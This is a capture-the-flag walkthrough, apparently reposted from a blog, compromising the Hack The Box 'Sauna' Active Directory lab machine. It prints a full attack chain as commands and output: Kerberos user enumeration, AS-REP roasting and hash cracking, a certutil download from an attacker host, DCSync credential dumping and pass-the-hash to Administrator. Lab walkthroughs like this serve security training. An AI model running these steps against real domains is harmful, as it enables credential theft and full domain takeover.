External Publication
Visit Post

Sauna CTF HTB

DEV Community [Unofficial] July 4, 2026
Source

Hi what’s up, welcome to my page. Today we are going to solve Sauna ctf in Hack The box. This ctf is about Active Directory, which is very important.

Enumeration nmap -sV -sC 10.129.95.180 Starting Nmap 7.98 ( https://nmap.org ) at 2026–07–03 13:16 -0400 Nmap scan report for 10.129.95.180 Host is up (0.21s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: Egotistical Bank :: Home | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026–07–04 00:16:58Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026–07–04T00:17:20 |_ start_date: N/A |_clock-skew: 6h59m50s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required As we can see, we have LDAP, evil-winrm, smb,http, rpc and many more ports.

RPC port

rpcclient -U "" -N 10.129.95.180 rpcclient $> enumdomusers result was NT_STATUS_ACCESS_DENIED rpcclient $> ^C We can’t use rpc port without authentication.

SMB port

`smbclient -L //10.129.95.180
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
 - - - - - - - - - - -
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 - no workgroup available`

Same thing.

LDAP We have port 88 and 636. That’s why we can use ldapsearch for domain enumeration. Let’s start it.

`ldapsearch -x -H ldap://10.129.95.180 -s base -b "" "(objectClass=*)" namingContexts
# extended LDIF
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectClass=*)
# requesting: namingContexts
#

#
dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1`

Domain Controller- egotistical-bank.local. And there are no interesting things.

KERBEROS Port 88 is active, we can use kerbrute tool for enumerate authenticated users. I’m using seclist for usernames but you can use any userlist txt.

./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop

2026/07/03 13:31:29 >  Using KDC(s):
2026/07/03 13:31:29 >   10.129.95.180:88

2026/07/03 13:32:09 >  [+] VALID USERNAME:       administrator@egotistical-bank.local
2026/07/03 13:35:45 >  [+] VALID USERNAME:       hsmith@egotistical-bank.local
2026/07/03 13:36:30 >  [+] VALID USERNAME:       Administrator@egotistical-bank.local
2026/07/03 13:38:47 >  [+] VALID USERNAME:       fsmith@egotistical-bank.local
2026/07/03 13:58:42 >  [+] VALID USERNAME:       Fsmith@egotistical-bank.local

We found 3 users.

AES-ROASTING For these users, we can use impacket script called GetNPUusers.py. This script allowed us to find hashes.

 GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd

We got fsmith’s hash.

Cracking the hash Hashcat help us to crack this hash.

hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd:Thestrokes23 We found fsmith’s password.

Gaining access to evil-winrm | PORT 5985

evil-winrm -i <ip> -u <username> -p <password>

evil-winrm -i 10.129.95.180 -u fsmith -p Thestrokes23

Evil-WinRM shell v3.9



Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith> cd Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir


    Directory: C:\Users\FSmith\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         7/3/2026   5:14 PM             34 user.txt



*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
*******

We got user.txt in desktop directory.

Privilege Escalation Firstly,we should upload winpeas on the victim machine for privilege escalation methods.

On attacker machine

Make sure you are supposed to be in directory which has winpeas inside.

python3 -m http.server 80 On victim machine

certutil -urlcache -split -f http://<ATTACKER_IP>:80/winPEAS.exe winPEAS.exe We can run winpeas with .\winpeas.exe

Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!

And there it is autologon user:svc_loanmanager

BloodHound

Take a look at bloodhound,and we can understood what loanmanager can do. loanmanager have 3 permissions: GetChangesAll, DCSync, GetChanges.

We use secretsdump for administrator hash.

`

`console
`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.129.95.180'
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
**import**('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[_] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[_] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Hash has been found but firstly we should make sure that we can login with this hash. So we use crackmapexec for prove.

`crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
SMB 10.129.95.180 445 SAUNA [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.95.180 445 SAUNA [+] EGOTISTICAL-BANK.LOCAL\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)
`Yeppp, we can use this hash for login!

**ROOT FLAG**

`>`impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 Administrator@10.129.95.180

> C:\Users> cd Administrator
>
> C:\Users\Administrator> cd Desktop
>
> C:\Users\Administrator\Desktop> dir
>  Volume in drive C has no label.
>  Volume Serial Number is 489C-D8FC
>  Directory of C:\Users\Administrator\Desktop
>  07/14/2021 03:35 PM
>
> .
>  07/14/2021 03:35 PM ..
>  07/03/2026 05:14 PM 34 root.txt
>  1 File(s) 34 bytes
>  2 Dir(s) 7,812,263,936 bytes free
>  C:\Users\Administrator\Desktop> type root.txt
>  *********``
>  BINGOOO!!!! We got root flag. Stay safe and goodbye.

Discussion in the ATmosphere

Loading comments...